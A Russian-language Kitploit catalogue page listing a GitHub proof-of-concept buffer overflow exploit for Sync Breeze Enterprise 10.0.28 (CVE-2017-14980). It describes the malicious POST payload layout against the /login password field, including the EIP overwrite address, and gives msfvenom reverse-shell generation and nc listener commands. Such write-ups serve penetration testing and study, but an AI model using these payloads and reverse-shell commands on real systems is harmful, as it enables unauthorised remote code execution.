Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2017-14980_syncbreeze_10.0.28_bof — Эксплойт переполнения буфера (Proof-of-concept) для Sync Breeze Enterprise v10.0.28 (CVE-2017-14980). Отправляет специально сформированную HTTP POST нагрузку для перезаписи EIP и выполнения пользовательского x86 шеллкода с целью произвольного выполнения кода. | Kitploit
Инструменты/GitHubGitHub/lipeozyy/cve-2017-14980_syncbreeze_10.0.28_bof
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодЭксплуатация веб-приложенийТестирование на ПроникновениеЭксплуатация Бинарных Файлов
GitHublipeozyy/cve-2017-14980_syncbreeze_10.0.28_bof

CVE-2017-14980_syncbreeze_10.0.28_bof

Эксплойт переполнения буфера (Proof-of-concept) для Sync Breeze Enterprise v10.0.28 (CVE-2017-14980). Отправляет специально сформированную HTTP POST нагрузку для перезаписи EIP и выполнения пользовательского x86 шеллкода с целью произвольного выполнения кода.

Репозиторий
231 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт - CVE-2017-14980 - Sync Breeze Enterprise v10.0.28

Этот репозиторий содержит доказательство концепции эксплойта переполнения буфера (BOF) для Sync Breeze Enterprise версии 10.0.28, нацеленный на уязвимость, обозначенную как CVE-2017-14980.

Описание

Уязвимость существует из-за неправильной проверки ввода при обработке поля password в POST-запросе к конечной точке /login.
Злоумышленник может отправить чрезмерно длинное значение в этом поле, что перезаписывает EIP и позволяет выполнить произвольный код.

Этот эксплойт отправляет тщательно сформированную полезную нагрузку, состоящую из:

  • 520 байт заполнителя ('A')
  • 4 байт для перезаписи EIP
  • 20-байтового NOP-слайда
  • Windows x86 shellcode, который можно настроить для выполнения произвольных команд

Как это работает

  1. Эксплойт создает вредоносный буфер, содержащий встроенный shellcode.
  2. Он отправляет HTTP POST-запрос к уязвимому серверу с полезной нагрузкой в поле password.
  • При обработке запроса приложение перезаписывает указатель инструкции (EIP) и выполняет shellcode, предоставленный атакующим.
  • Требования

    • Компилятор C (например, gcc)
    • Сетевой доступ к цели, на которой запущен Sync Breeze Enterprise 10.0.28
    • Настройка адреса EIP (\x83\x0C\x09\x10) и shellcode при необходимости

    Пример генерации shellcode с помощью msfvenom:

    root@kitploit:~
    msfvenom -p windows/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
    
    root@kitploit:~
    gcc exploit.c -o exploit
    ./exploit
    
    
    root@kitploit:~
    nc -nlvp 4444
    
    Скачать инструмент